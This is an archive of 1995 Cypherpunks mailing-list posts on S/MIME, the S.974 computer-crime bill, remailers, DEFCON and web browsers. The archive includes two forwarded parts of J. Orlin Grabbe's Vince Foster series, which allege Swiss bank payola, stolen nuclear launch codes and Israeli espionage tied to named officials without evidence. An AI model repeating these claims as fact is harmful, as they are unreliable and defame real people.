Message-ID: <v02130500ac384a4bd799@hal9001.dialup.access.net>
MIME-Version: 1.0
Content-Type: text/plain


At 23:53 7/22/95, Samuel Kaplin wrote:
>On Sat, 22 Jul 1995, Sandy Sandfort wrote:
>
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>>                           SANDY SANDFORT
>>  . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
>>
>> C'punks,
>>
>> Blanc wrote:
>>
>> >>            PRSRVYPRFCTMNVRKPTHSPRCPTSTN
>> > ....................................
>> >
>> > It looks to be something like this to me:
>> >
>> > PRESERVE YE PERFECT MEN ?VR? KEEP THIS PERCEPT (or PRECEPT) SATAN
>>
>> Close, very close.
>>
>>
>>  S a n d y
>>
>> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
>
>Preserve ye perfect men ever keep the precepts ten
>
>(As in Commandments!)


In that case you gave an incorrect message to decode (by adding vowels)
since your expansion/decode had no S between the TH of "THe" and the PRCPTS
of "PReCePTS" <g>.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Sun, 23 Jul 95 14:19:13 PDT
To: Bob Snyder <rsnyder@janet.advsys.com>
Subject: Re: S/MIME and the Future of Netscape
In-Reply-To: <199507231254.IAA22648@janet.advsys.com>
Message-ID: <9507232116.AA12258@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



Bob Snyder writes:
> tcmay@sensemedia.net said:
> > With regard to SSL and Netscape not being open to outside developers, 
> > several leading e-mail outfits, including Qualcomm, Netscape, 
> > Frontier, etc., are working on an interoperable secure e-mail 
> > standard called "Secure/MIME," or "S/MIME." 
> 
> Do you have sources for this information?  MOSS is out there at least as a 
> Internet Draft,

In fact, MOSS is now a Proposed Standard.

> and possibly further along, and Steve Dorner of Qualcomm, the
> original author of Eudora, is pretty active in the MIME community
> and I doubt he would support a second MIME type to do the same
> thing...

I would guess the same.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Sun, 23 Jul 95 14:49:11 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: S.974 Action, & Senate Judiciary Subcommittees
Message-ID: <9507232149.AA05185@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[please don't cc: me on any replies also directed to cypherpunks@toad]

Paul Elliott asked about the subcommittee referral of S.974 in the Senate
Judiciary Committee. Although I've never done more in Arizona than loiter in
the Phoenix airport, a staffer in Sen. Kyl's office kindly responded to my
request for information about Judiciary subcmtes. and action on S.974 (on a
Sunday, no less !)

Charles Grassley (R-IA) is the primary sponsor of S.974, and Jon Kyl (R-AZ)
is the cosponsor. 

Sen. Grassley chairs the Subcmte. on Administrative Oversight & the Courts, 
(202) 224-6736. Sen. Leahy (D-VT), who's sponsoring an alternative to the
CDT, also sits on this subcommittee.

Sen. Kyl sits on the Subcmte. on the Constitution, Federalism & Property 
Rights, (202) 224-8081. Sen. Feingold (D-CO), who has spoken out against
the CDT, is also a member of this subcommittee.

Both Grassley & Kyl are on the Immigration Subcmte., (202) 224-6098, but it's
hard to see why the bill would get referred there.

The Subcmte. on Terrorism, Technology & Government Information, 
(202) 224-6791, might take an interest in S.974, but neither Grassley nor
Kyl sits on it. Leahy belongs to this subcmte.

There's no sign in the Congressional Quarterly synopsis of any subcommittee
referral of S.974 thus far:

Forwarded from info@kyl.senate.gov:
> 1 of 1 items                                CQ's WASHINGTON ALERT  07/23/95
> 
> *** FULL REPORT -- DIGEST, LEGISLATIVE ACTION, COSPONSORS, SPEECHES ***
> 
> MEASURE:         S974
> 
> SPONSOR:         Grassley (R-IA)
> 
> BRIEF TITLE:     Anti-Electronic Racketeering Act of 1995.
> 
> OFFICIAL TITLE:  A bill to prohibit certain acts involving the use of
>                  computers in the furtherance of crimes, and for other
>                  purposes.
> 
> INTRODUCED:      06/27/95
> 
> COSPONSORS:      1 (Dems: 0  Reps: 1  Ind: 0)
> 
> COMMITTEES:      Senate Judiciary
> 
> SHORT TITLE AS INTRODUCED:
>   Anti-Electronic Racketerring [sic] Act of 1995
> 
> CRS SUBJECT INDEX TERMS:
>   Crime and criminals
>   Actions and defenses
>   Civil liberties
>   Computer crimes
>   Computer networks
>   Computer software
>   Criminal justice
>   Damages
>   Data banks
>   Destruction of property
>   Electronic surveillance
>   Evidence (Law)
>   Jurisdiction
>   Law
>   Legal fees
>   Money laundering
>   Organized crime
>   Right of privacy
>   Searches and seizures
>   Technology
>   Wiretapping
> 
> 
> LEGISLATIVE ACTION:
> 
> 06/27/95 Referred to Committee on the Judiciary (Text of bill
>          appears on pgs. S9180-S9181 of the June 27, 1995,
>          Congressional Record) (CR p. S9174)
> 
> 06/27/95     GRASSLEY, R-Iowa, Senate speech: Introduces the
>              Anti-Electronic Racketeering Act of 1995. (Text of
>              bill) (CR p. S9180-S9181)
> 
> 07/20/95 Cosponsor(s) added: 1
>   Kyl (R-AZ)



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lmccarth@cs.umass.edu (L. McCarthy)
Date: Sun, 23 Jul 95 15:14:55 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Remailers & local newsgroups
In-Reply-To: <199507230506.WAA07551@goblin.punk.net>
Message-ID: <9507232214.AA05350@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


[cc:ed to remailer-operators; I suggest replies to the latter]

The Checkered Daemon writes:
> Do any of the posting remailers accept the inclusion of regional usenets
> in their active files so that people can use them to post directly to 
> regional newsgroups?

Last I heard, Julf generally honors requests for penet.fi to carry additional
groups. If you don't know the contact address of a particular remailer
operator, remailer-operators@c2.org is probably the best place to try to
get in touch with one. (Most c'punk remailers mention an admin/complaints
address in the headers of their remailed messages.)

Many cpunk/mix remailers these days allow newsgroup posting only via mail2news
gateways, so you may need to convince the operator of one of those to add a
group.

In itself, this doesn't necessarily solve your problem, due to the nature of
Usenet news propagation. Briefly, if a site "upstream" of the posting site in
the propagation tree doesn't carry a certain group, then articles posted only
to that group won't make it out to much of the net. The most popular solution
to this predicament is "piggybacking" -- crossposting an article into a well-
propagated group so that it makes it across holes in the lesser-carried
group's propagation. The *.test groups are often used for this, although
you'll irritate plenty of people if you don't set the Followup-To: on your
article out of the test group. 
 
-Futplex <futplex@pseudonym.com>
"Jeux sans frontieres"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: QLDM75A@prodigy.com (MR ELDON B JENKINS)
Date: Sun, 23 Jul 95 16:06:12 PDT
To: cypherpunks@toad.com
Subject: Anyone going to DEFCON
Message-ID: <013.08997009.QLDM75A@prodigy.com>
MIME-Version: 1.0
Content-Type: text/plain


> As chance has it, I will be vacationing in Las Vegas July 29 - 
August 6. 
> Is anyone else planning on going to DEFCON? I won't be attending 
the 
> whole thing, just selected exerpts, but if there is a get together 
let me 
> know!As chance has it, I will be vacationing in Las Vegas July 29 - 
August 6. 
> Is anyone else planning on going to DEFCON? I won't be attending 
the 
> whole thing, just selected exerpts, but if there is a get together 
let me 
> know!

I don't know if anyone else from this list is going but I will be 
there for the whole conference and wouldn't mind meeting up with some 
of the people from this list.  You might want to join the "defcon 
stuff" list.  It is just for people going to DefCon to talk about 
meetings and stuff.  It is dc-stuff@fc.net (I think) if that doesn't 
work mail me and I'll get it from one of my message.

Eldon Jenkins





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 23 Jul 95 15:36:17 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win(dows)
Message-ID: <v02120d04ac387ca1423a@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 12:32 PM 7/21/95, Timothy C.  May wrote:
>
>No, I don't use any of the "-works" apps, and I think the success of the
>Web speaks for itself... This is not a view I have just come to, as my
>recent message shows.

Agreed.  My posting seemed to get stuck in the response queue to the
original post, and came out a little "dated", I guess...

>
>And I'm not wedded to "Netscape" per se, though that particular environment
>has the current momentum.  I've also used Mosaic and MacWeb to do much the
>same things, but find Netscape smoother.

I agree.  By far the best web-browser out there is Netscape.  They don't
call it Mozilla for nothing.

>
>Out of curiosity, the phrase "grown out of Netscape," aside from the
>implied barb, means what?  Just what am I missing and what do I need to
>"grow out of"?

No.  That seems to be my unintentional verbal style on the net, a little
prickly around the edges.  My actual barbs are so over the top that you'll
never misunderstand them for their subtlety.

What I mean is, that after you've used Netscape, a web client, to read news
for a while, you'll start to think about more specialized applications like
Newswatcher, for instance.

The reason that Netscape has either built-in news reading or mail reading
functions is feature creep.  My hypothesis is that feature creep is brought
about by some combination of venture capitalists, securities analysts, and
"real marketing people", all of which Andreasson at Netscape has in spades,
now, all with their chins on his shoulder saying, "That's nice, what else
will it do?".  In-line gifs or jpegs (or mpegs or whatever) are integral to
the function of seeing what's on the web.  So are in-line FTC, Gopher, etc.
I think.  My opinion about e-mail and news are that they're pretty
orthogonal to the functionality of a web-browser.  Kind of like building
wheels on a boat.

>If, perchance, this is just what of those throwaway barbs, implying I move
>from fad to fad (as Fraering's post implied), you should know that I stuck
>with tin/elm/emacs/Eudora for more than 3 years, as nothing obviously
>better--and worth the learning curve to switch to--had come along.  (In the
>Mac domain I used other programs, none of them "-works" packages.)

No, Tim, your mother does *not* wear army boots.  ;-).  I just have several
friends who recently moved to a TCP net feed and thought they only needed
Netscape.  That is, until they used Eudora, and/or Newswatcher (preferably
in it's "value added" editions), and switched to them instead for their
respective purposes.

>But, I'll tell you what, I *will* tell you about it in 6 months, whether or
>not I've grown out of Netscape!

Of that we can rest assured.  :-).

Cheers,
Bob Hettinga

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBLOsPgyLN8bw6ZVAQEzbAP/eosm6SNC1TdvduCWlPVO9WDbqlAcQtvj
jL+jsy0QjEgMNwsGQGCQBAHMXxtOJC2GPC+lGVfGZcTDFljvgzhBJc2/QWI0mQcK
Jz/vdYGfxhkBSlW0Xm+zcilmyYgvMr/KeIeJUcExYyVSSWpof7fuSG6jkfVmTWZ5
JDSHHd922U4=
=ipGf
-----END PGP SIGNATURE-----

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L. McCarthy" <lmccarth@thor.cs.umass.edu>
Date: Sun, 23 Jul 95 15:39:50 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: An idea about Java and remailer clients and servers...
In-Reply-To: <199507221301.AA27475@tyrell.net>
Message-ID: <199507232239.SAA32575@thor.cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Phil Fraering writes:
> I was under the impression that there was a lot of common code
> between the Mixmaster client and server versions, at least in
> the current version.
> 
> Does it have to be the case, then, that we even have separate client
> and server versions? If a new program is going to be written in Java,
> can't it have the functionality of both client and server?

Indeed, that's the way the C version works now:

[from README.client in the Mixmaster distribution]:
# Mixmaster uses the same source & binary for the remailer program and the
# client program. Setting up a client, however, is significantly easier.

> Why not "charge" for the ability to send an anonymous message with
> the duty to have for a short time (maybe an hour or two) running on
> your machine a node in a remailer network?

It would be interesting to see how the market would react to this. There
might be quite a bit of reluctance to take on the liability of a remailer
operator just to send an anonymous message (maybe that's a good thing ;)

Some mechanism would need to be worked out to tie delivery of each message
to satisfactory performance of its true originating address, without making
it much easier for an opponent to tie a message to its point of origin.

-Futplex <futplex@pseudonym.com>
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Sun, 23 Jul 95 15:58:43 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win(dows)
Message-ID: <v02120d0aac388454110e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>the function of seeing what's on the web.  So are in-line FTC, Gopher, etc.
                                                           ^^^

Onk?

Revenge of the spellchecker (Spellswell in this case). Of course, I mean FTP.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 23 Jul 95 17:09:15 PDT
To: cypherpunks@toad.com
Subject: Kalliste re. Foster / NSA, VII
Message-ID: <Pine.SOL.3.91.950723200122.20174A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


From KALLISTE@delphi.comFri Jul 21 10:59:41 1995
Date: Fri, 21 Jul 1995 04:04:35 -0400 (EDT)
From: KALLISTE@delphi.com
Subject: Part VII

-----BEGIN PGP SIGNED MESSAGE-----


          Allegations Regarding Vince Foster, the NSA, and 
                Banking Transactions Spying, Part VII

                        by J. Orlin Grabbe
        
        It has come time to talk of Vince Foster and virtual 
        realities.

        1.  One type of virtual reality immersion takes place every 
        evening with respect to network news.  One sits in a familiar 
        chair, and watches familiar faces on familiar channels telling 
        soothing or alarming things about other parts of the world--other 
        realities--of which the viewer has no experience, all of it 
        demonstrated by reality-simulating sound bites and video clips.  

        The virtual reality construction is good if the story sounds 
        plausible.  That is, after all, the job of a TV reporter:  
        to tell a plausible story and to entertain our eyes by looking 
        good while telling it.  
        
        The pulp magazine reporter, on the other hand, must tell 
        a plausible story and keep it lurid enough to grab our 
        imagination.  Take the allegedly important question of "child 
        porn on the Internet," recently paraded forth by *Time* 
        magazine.  To the computer-impaired, pedophilia might serve 
        as a plausible explanation why anyone would sit for hours in 
        front of a computer screen. Never mind that the neighborhood 
        Internet-user says differently: you can't take the word of a 
        pedophile can you?  
        
        The Internet-user, on the other hand, may believe that rock 
        videos are a more reliable guide to reality than *Time* 
        magazine.  And even if he were actually interested in porn, 
        he might find life easier by going to the local video store 
        where a single video tape could store as much graphical infor-
        mation as could be stored on 2000 digital compact disks.

        2.  Another type of virtual reality is found in the banking
        world.  Money is data stored in a computer.  This money
        is "transferred" place to place by changing the ownership
        labels associated with the data.  Once the computer receives  
        the proper transfer authorization codes, the money can be
        "launched" from one bank to another, from one account to  
        another.  All that is necessary is that one properly
        emulate the reality that is important to the bank computer.

        If you include all the right digital indicators that make it 
        plausible to the computer that you are the authorized transfer 
        person for, say, the account owned by C. Jefferson, the computer 
        will believe you. It won't care about non-virtual reality--what
        C. Jefferson looks like, or what her tastes in clothes are-- 
        nor will the computer have metaphysical doubts to cause it to 
        hesitate in its actions before sending the money on its way.  
        "You" are nothing more than a preselected set of codes.
        
        In the version of Jim Norman's article *Fostergate* published in 
        *Media Bypass* (August 1995), it is stated:  
        
        "For months, a small cadre of CIA computer hackers known as the
        Fifth Column, armed with a Cray supercomputer, had been monitoring
        Foster's Swiss account. . . . Foster was just one of the first
        of scores of high level U.S. political figures to thus have their
        secret Swiss accounts looted of illicit funds . . . . Over the
        past two years . . . more than $2 billion has been swept out of 
        offshore bank accounts belonging to figures connected to the 
        U.S. government with nary a peep from the victims or their
        banks."
                
        Where did the money in the accounts come from?  Jim Norman doesn't 
        say.  I assert that some of this loot is defense and arms dealing 
        payola; some of it is drug dealing profits or payola; and some of
        it is payola from the floating fortune left by a forgotten oil man--
        whose money moves from bank to bank in a merry-go-round to keep 
        its location hidden from the potential heirs.

        And some of the loot was paid in an attempt to allow one nation 
        to become a VIRTUAL NUCLEAR POWER.
                                
        3.  Missile launches take place in a virtual reality.  Given 
        the proper launch code, the missile will attempt to go to its 
        programmed destination without further theological debate.
                
        A country possessing the launch codes and also targeting infor-
        mation for *another* country's nuclear missiles could become a 
        virtual nuclear power. (The targeting information would be as
        important as the launch codes.  For before you launched a missile, 
        you would first want to know where it is going. After all, it 
        could be aimed at you.)  Getting your nuclear arms this ways would 
        have obvious economic advantages: someone else would foot the 
        military bill.

        Jim Norman states in *Fostergate*:  
        
        "According to a heavily-redacted New Mexico FBI counter-
        intelligence report, Maxwell was apparently allowed to sell
        two copies of PROMIS back to the U.S. weapons labs at
        Sandia and Los Alamos, for what Inslaw claims was a hugely
        inflated price of $87 million.  That would have allowed
        Pollard, if he was using the rigged program, to obtain U.S.
        missile targeting data long before Israel had its own
        satellite capability, thus making it a real nuclear threat
        to the Soviet Union."
        
        Well, yes, it could make Israel a real threat to the Soviet 
        Union.  But not from Israel's own puny missile program.  
        Rather, Israel could be a threat to the Soviet Union because it 
        would be able to launch our (U.S.) missiles at the Soviet Union.

        Being a virtual nuclear power would mean not having to say you 
        are sorry.  If a U.S. missile were launched at Russia, the defense 
        system of Russia would, in its virtual view of the world, see the 
        missile as coming from the U.S.  It would launch a retaliatory 
        strike against the U.S., because in its reality only the U.S. could 
        be responsible.  It wouldn't be programmed to recognize "Missile 
        from U.S. not U.S.-intended action."

        Being a virtual nuclear power means you could *blackmail people 
        in both directions*: you could blackmail the targeted city or area.  
        More importantly, you could blackmail the U.S. If the U.S. doesn't 
        go along with your demands, why, you could involve it in a nuclear 
        war in which you would be a spectator, not a participant.  The 
        U.S. would know it has more to lose than you do, so it would give 
        in to your demands.

        Vince Foster's NSA connections wouldn't give him access to such 
        launch codes and targeting data. Not even with the help of Jonathan 
        Pollard. It would take the cooperation of a small circle of 
        friends--friends with Defense and Intelligence connections.  
        People with access. People with authority.    

        Would any of the U.S.'s own Defense Department or Intelligence 
        personnel in the 1980s or the 1990s, people other than Jonathan 
        Pollard, have been involved in such a transfer of information to 
        a foreign power--whether to Israel or to anyone else?

        Surely not anyone connected to the account numbers KPFBMMBODB 
        or KPFBMMBODE held at the Union Bank of Switzerland?  Please, 
        say it ain't so.

        For if they were, the U.S. may now be facing its greatest 
        National Security threat since the Cuban Missile Crisis.  And
        that's why everyone has an interest in covering up the various 
        threads connected to the death of Vince Foster.  Some are scurrying 
        around, hoping no one will realize how bad things are before 
        the mess can be cleaned up.  Others are scurrying around, just 
        covering their asses.  It's showdown time, with no space for 
        killing all the remaining witnesses or burying all the remaining 
        evidence.  It's showdown time, and the money people thought they 
        had for ammo is missing from their Swiss accounts.

        The levels of disinformation have already been prepared.  The
        first level says Vince Foster was just a political flack who  
        committed suicide.  The next one says, yeah, he was into some
        nasty stuff like money laundering, but had no intelligence
        connections.  The next one beyond that allows him to work for
        the NSA, but not for long or in a very important position.  
        The next one allows Foster to sell some nuclear secrets to
        Israel, but that was just to accelerate their own nuclear program,
        as a bulwark against the Soviet Union. And anyway, Foster acted
        alone.  And so on, spin control all the way.  Foster, being
        dead, will have nothing to say about his many potential roles.
                                         
        But underneath all this the Powers That Be have begun to 
        comprehend that some of their own have threatened their very 
        survival.  And the Powers That Be are going to clean house with 
        a vengeance.

                        [To be continued]

        

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMA95UGX1Kn9BepeVAQEhHgP/bfzNzLA7vM/g51Tz6OK7OVf6C+oMhFsF
G4/RM4qBUQUxB51YAcQu7RLSxhpolml/kDu2eeEk/AAu5JWG2dLDyOWdnW5ODOJ3
yaY6F4t5CQh2eccAYQegbjsL+2FQ5yO3Lp+pi9jkvAGKLQEUD65QlTOeLfP2xlBV
9j8iz/gFYpg=
=gv8z
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Sun, 23 Jul 95 17:14:19 PDT
To: cypherpunks@toad.com
Subject: Part VIII: Vince Foster (fwd)
Message-ID: <Pine.SOL.3.91.950723200754.20174C-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Sun, 23 Jul 1995 20:08:57 -0400 (EDT)
From: KALLISTE@delphi.com
To: bdolan@use.usit.net
Subject: Part VIII: Vince Foster

-----BEGIN PGP SIGNED MESSAGE-----


	   Allegations Regarding Vince Foster, the NSA, and 
		Banking Transactions Spying, Part VIII

		      by J. Orlin Grabbe
	
	Did our former Secretary of Defense Caspar Weinberger,
like Vince Foster, have a Swiss Bank account?  Does he still? 
Is his name on account number KPFBMMBODE at the Union Bank 
of Switzerland?  Was that why Caspar Weinberger, Publisher Emeritus 
at *Forbes*, became so gung-ho to get Jim Norman's article 
*Fostergate* killed?   
	
	What is the relationship between Caspar Weinberger and Vince 
Foster?  

	What does Ron Perelman, an equity owner of *Forbes* and Revlon, 
have to say about all this?  (Is there lipstick all over the Pentagon?)

	Don't get me wrong.  I think the Swiss banking system is the 
finest in the world, and we should ALL have Swiss banking accounts. We 
should ALL have the right to hide our assets from prying eyes.  Just as 
long, of course, as those assets were fairly earned--and they don't 
represent payola from public defense projects.  Or proceeds from the 
sale of *bona fide* national security secrets.  Or payola to keep the 
knowledge of such sales secret.  
       
	Were Caspar Weinberger's Swiss assets simply savings from his
paycheck and profits from his investments?

	Are U.S. nuclear secrets for open sale on the world market
from one of our alleged "allies"?        
	
	Bobby Ray Inman graduated from the Naval War College in 1972, 
became Assistant Chief of Staff for Intelligence of the Pacific Fleet 
in 1973, Director of Naval Intelligence in 1974, Vice Director of the 
Defense Intelligence Agency in 1976, Director of the National Security 
Agency in 1977, and Deputy Director of Central Intelligence under Ronald 
Reagan in 1981.  He left that post in March 1982.  In December 1993 he 
was nominated by Bill Clinton to be Secretary of Defense.
("Bibliography of Bobby Ray Inman," Office of the Press Secretary, 
The White House, December 16, 1993.)

	"After Admiral Inman's announcement that he would not serve 
as Clinton's Defense Secretary, the Hebrew press devoted a fair amount 
of space to the implications of that affair for Israel. . . . Most 
important among these writings were the articles by Amir Oren 
(*Davar*, January 28) and Yoav Karni, published the same day in the 
newly founded weekly *Shishi*. . . . Oren's article in particular
stressed the incompatibility between Inman's past policy
recommendations  and Israeli political aims, especially in regard
to nuclear developments. Both authors, who usually are mildly
critical of Israel's policies but never of its nuclear build-up,
were emphatic in their hostility toward Inman. Furthermore, Oren
discussed in depth Pollard and Israeli espionage in the U.S. as
having something to do with Israeli objections to Inman as a
person and to his policy recommendations." (Israel Shahak,
"Involvement of the pro-Israel lobby in the Inman affair,"
Report No. 133, February 11, 1994.) 

	Shahak goes on to note that:  "When Yoel Markus (*Haartez*,
December 31, 1993) spoke of the recent 'courtship' of Israel
by various states, he concluded that 'this courtship has nothing
to do with the peace process . . . When the U.S. is being ruled
by an administration as favorably disposed to Israel as the present
one, conviction spreads in every state that the only way to America's
purse leads via Israel.' "

	A chief objection to Inman was he might implement U.S.
inspections of the Israeli nuclear production process at Dimona:

	"Oren mentions a number of reasons why Israel loathed and
feared Inman.  But as the main of those reasons Oren projects the
Israeli expectation that, if appointed the U.S. Defense Secretary,
Inman would be able to put into effect independent American
inspections of Israeli nuclear armaments and their production 
process in Dimona.  It needs to be recalled that by virtue of a
secret agreement with the U.S. reached during the first year of
John F. Kennedy's term of office as president, the U.S. to this
day receives only such information about Israeli nuclear power
as Israel is pleased to convey.  After the Bay of Pigs fiasco
Kennedy needed the support of the 'Jewish lobby'.  In order to
get it, he okayed this curious agreement." (Israel Shahak)

	Shahak cites evidence that much of Israel nuclear capability 
had been acquired through espionage directed against the U.S. (The
following reference to "Critical Mass" is to a book called *Critical 
Mass* by William E. Burrows and Robert Windrem.)


	"*Yediot Ahronot*'s correspondents Tzadok Yehezkeli and Danny
Sadeh (January 30), write in their review of the book "Critical
Mass" . . . that 'Israel solicits money from wealthy Jews from all over 
the world for financing its nuclear weaponry programs. This fundraising 
drive is directed by a committee comprised of 30 Jewish millionaires'.
 . . . .
  
	"[Tzadok Yehezkeli and Danny Sadeh] write that 'Israel is ever ready 
to launch its nuclear missiles on some 60 to 80 targets. Those targets
include the sites in the Gulf, the capitals of all Arab states, some nuclear 
bases on the territory of the former USSR and some sites in Pakistan'. 
(I am convinced this is accurate.) It means that Israel must very much 
want to obtain the U.S. satellite information about the entire targeted 
area, a not so negligible part of the earth's surface. The existence of a 
so formidable nuclear power in Israel's hands can not be convincingly 
attributed to its own Research and Development efforts nor even to its 
role as a tool of American policies. On the contrary, a nuclear power of 
that magnitude must be presumed to run counter to U.S. imperial interests. 
The only plausible explanation is that Israel has acquired its nuclear 
power with at least some help of its 'Jewish friends' in the U.S.  
Yehezkeli's and Sadeh's information about 'the nuclear bases on the 
territory of the former USSR' fits well with what Geoffrey Aronson,
relying on State Department sources, reveals about the Pollard affair 
("The Christian Science Monitor", January 27). He writes that according 
to 'unanimous response' from these sources, what Pollard has been always 
said to have betrayed, were 'this country's most important secrets', 
namely the 'information relating to U.S. targeting of Soviet nuclear and 
military installations and the capabilities and defenses of these sites'. 
This seems to accord with Israel's global aspirations based on its nuclear 
power. Aronson also quotes his sources to the effect that much of
intelligence passed on by Pollard 'was unusable to the Israelis except as 
bargaining chips and leverage against the United States and other countries' 
interests'.  In view of this fact Aronson conjectures that Pollard's 
intelligence was used by Israel for deals with Moscow consisting of 
'trading nuclear secrets for Soviet Jews'."  (Israel Shahak)
						     
	Shahak goes on to quote Oren with respect to Jonathan
Pollard:  ". . . 'a Navy Intelligence employee, Jonathan Pollard,
was caught red-handed while passing on to Israel precisely this kind 
of information which Inman had decided to withhold from Israel. . . .  
And interpreted likewise as coincidental were the links connecting
Rafi Eitan, then the chief of the 'Office for Scientific Contacts'
(LEKEM), who employed Pollard, with the [Israeli] Defense minister,
Ariel Sharon, who had appointed Eitan and who rushed to Washington
in order to complain against Inman and his orders.'.... Eitan ran
Pollard with the explicit approval of four Defense ministers and 
Prime Ministers, concretely Arens, Rabin, Shamir and Peres.'"

	Rafi Eitan's reward for the Pollard affair?  "After helping
sell Iraqi oil all over the world, he now oversees the Israeli trade
with Cuba" (Shahak).

	Let me ask again: Are U.S. nuclear secrets for open sale on the 
world market from one of our alleged "allies"?  

	Are U.S. nuclear secrets for open sale by the Defense Department 
personnel who allegedly guard them?      

	Why did Mike McCurry, Press Secretary on the White House, spent time trying 
to convince Sarah McClendon, veteran White House journalist, that Jim Norman is a
fruitcake? 

	If Jim Norman is a liar or a fruit cake, why did an editor at *Insight* magazine 
receive a visit from the Pentagon? Why was Jim Norman's in-progress interview with Jack Christie on the USA Radio Network today (July 23, 1995) interrupted for reasons 
of "national security"?  If lying is a national security problem, what is Bill Clinton doing
in the White House?

	Why is it that the sale of *bona fide* national security secrets is tolerated, even rewarded with lucrative payments to Swiss accounts, while journalistic reports about THE LOOTING AND SALE OF U.S. NUCLEAR SECRETS are quashed as "national security"?  Is
 the Pentagon run by lunatics and thieves?   

	"We have put our faith in the bomb, and it is the bomb which 
will answer our prayers."--Henry Miller, *The Time of the Assassins*

		    [To be continued]








-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMBMJTWX1Kn9BepeVAQG+IgP/TUu5xuMFrovIWwI7obwjIqkXCfY+aDWd
QyBlv3XeLly8QY1Kxc51yYlylrnWgIqlUJwphpBxy5T7YchJvHGxT3uyevVs4mME
sZ7Czh4ulVqX2swAZ8cHs5COjbeu1jtfFEqvKhIaapoHAQ84/AO+4OdXgbiwF/6g
N6mSJ2BQfPE=
=BEom
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@sensemedia.net (Timothy C. May)
Date: Sun, 23 Jul 95 20:33:54 PDT
To: cypherpunks@toad.com
Subject: RE: Netscape the Big Win(dows)
Message-ID: <ac3860f400021004569b@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:36 PM 7/23/95, Robert Hettinga wrote:

>What I mean is, that after you've used Netscape, a web client, to read news
>for a while, you'll start to think about more specialized applications like
>Newswatcher, for instance.

Speaking for myself, of course, I used Newswatcher _before_ using
Netscape's newsreader.

>No, Tim, your mother does *not* wear army boots.  ;-).  I just have several
>friends who recently moved to a TCP net feed and thought they only needed
>Netscape.  That is, until they used Eudora, and/or Newswatcher (preferably
>in it's "value added" editions), and switched to them instead for their
>respective purposes.

I've been using Eudora since early on, in 1992, via my Netcom shell
account. And Eudora Pro since it came out. Now I use it on my PPP account,
but the functionality is essentially the same as when I was using a shell
account.

As for Newswatcher, see above. As for other non-Netscape tools, I also have
MacWAIS, Anarchie, TurboGopher, Finger, NCSA Telnet, Talk, etc. I use
specialized tools when the need arises.

But Eudora + Netscape meet most of my Net needs, which are for doing mail,
reading and posting to News, fetching files, checking out Web sites, etc.

I'm not saying this combination meets the needs of everyone, and their
mileage will likely vary, but I do dislike arguments of the flavor: "Ah,
Tim, wait until you learn what a real computer is, wait until you see
what's out there besides Netscape."

--Tim May

..........................................................................
Timothy C. May         | Crypto Anarchy: encryption, digital money,
tcmay@sensemedia.net   | anonymous networks, digital pseudonyms, zero
408-728-0152           | knowledge, reputations, information markets,
Corralitos, CA         | black markets, collapse of governments.
Higher Power: 2^756839 | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Elliott <paul.elliott@hrnowl.lonestar.org>
Date: Sun, 23 Jul 95 14:21:46 PDT
To: vtw@vtw.org (voters telecom watch)
Subject: Re: Why no action alert, coalition opposing S. 974?
In-Reply-To: <199507212057.QAA15341@eff.org>
Message-ID: <3012a599.flight@flight.hrnowl.lonestar.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

